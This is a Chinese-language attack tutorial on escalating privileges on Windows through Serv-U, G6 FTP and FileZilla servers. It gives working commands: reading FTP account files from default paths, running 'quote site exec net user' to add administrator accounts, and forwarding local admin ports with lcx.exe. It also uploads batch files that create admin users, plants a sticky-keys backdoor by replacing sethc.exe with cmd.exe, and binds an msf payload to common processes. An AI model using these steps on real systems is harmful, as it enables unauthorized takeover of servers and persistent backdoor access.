server_U 提权
对于不可写权限,serv_u 6.4以下的,如果默认密码没有修改的,直接可以提权。serv_u 7以上的可以修改下脚本提权目录,不要用默认的C盘,改在其他盘符用脚本提权。serv-u的默认端口是43958,密码文件的安装目录 c:\Program Files\Serv-u\SerUDaemon.ini
一、读取配置文件
1.server-u默认安装目录下的ServUDaemon.ini文件记录着所有的ftp账号信息(32位默认安装路径C:\Program Files (x86)\RhinoSoft.com\Serv-U\ServUDaemon.ini),拿到密码可以直接拿去md5解密
2.如果有权限修改ServUDaemon.ini文件,可直接增加高权限ftp用户。添加账号的password值是加盐md5加密后的值(例如:盐是cq,就md5加密cq123456,然后Password=cq+md5(cq123456)
3.如果得到的ftp账号权限是管理权限,可直接ftp登录执行命令创建用户
quote site exec net user test test123 /add
quote site exec net localgroup administrators test /add
如图用户创建成功,而且是管理员权限
方法二、大马通过server-u的管理员账号创建新的ftp账号,然后用大马创建的账号登录进行提取## 方法三、直接提权
server-u的管理员账号权限较大,相当于系统权限,可以通过管理员账号直接创建用户,并且加入到管理员组。
如果server-U 用户默认密码被修改了,下载ServUAdmin.exe文件用c32打开就可以找到账号及密码,注意使用迅雷可能会出现问题,建议直接用浏览器下载
G6 ftp提权ftp
G6ftp安装目录下remoteadmin/remote.ini文件包含有账号信息,可通过解密得到账号密码,有修改权限也可以直接修改或添加用户
g6ftp默认监听在127.0.0.1的8021端口上,所以需要使用lcx 工具将该端口转发出去。如果无法执行cmd命令,需要在可读可写目录上传cmd和lcx等程序,然后才能进行端口转发
1.端口转发
lcx.exe -tran 8222 127.0.0.1 8021
#转发127.0.0.1 8021端口到全IP 8222端口
在服务器里面查看。确定已经转发成功
2.远程登录
端口转发完成后,直接使用g6ftp客户端以管理员用户远程登录软件。这里分别填入转发后的端口已经在最开始得到的用户名及密码
连接成功
3.创建ftp用户
设置用户家目录
给该账号所有权限
4.新建批处理命令,分别填入命令名称以及要执行的批处理文件路径
5.通过新建的ftp用户上传文件1.bat
#批处理文件内容
net user ftptest 123.com /add
net localgroup administrators ftptest /add
6.执行批处理命令,客户端会加载支持此批处理
quote site useradd
7.提权成功,新建了ftptest账户,且为管理员权限
filezilla提权
filezilla是一款开源的FTP服务器和客户端的软件。若安装了服务器端默认只侦听127.0.0.1的14147端口。并且默认安装目录目录下有两个敏感文件 filezilla server.xml(包含了用户信息)和filezilla server interface.xml(包含了管理信息)
C:\Program Files\FileZilla Server\FileZilla Server Interface.xml
提权思路:
1.下载这个两个文件,拿到管理密码
2.配置端口转发,登录远程管理ftp server
提权步骤:
1.端口转发
C:\Inetpub\wwwroot\8099\lcx.exe -tran 14148 127.0.0.1 14147
2.远程连接
转发完成后使用filezilla 服务端软件远程连接,登录成功
3.创建ftp用户
4.设置密码
5.设置家目录及控制权限
6. 使用filezilla客户端远程连接成功
7.使用cmd.exe改名为sethc.exe替换c:\windows\system32\sethc.exe生成shift后门
8.连接3389按5次shift 调出cmd.exe
taskmgr
# 调用任务管理器
explorer.exe
# 调用桌面
net user test 123.com /add
net localgroup administrators test /add
#创建用户
注意:高版本服务器进不了登录界面,无法利用五次shift弹出cmd.exe。可以利用msf生成payload捆绑到目标cmd.exe/explorer.exe(经常使用的进程)上等待目标上线。然后进行提权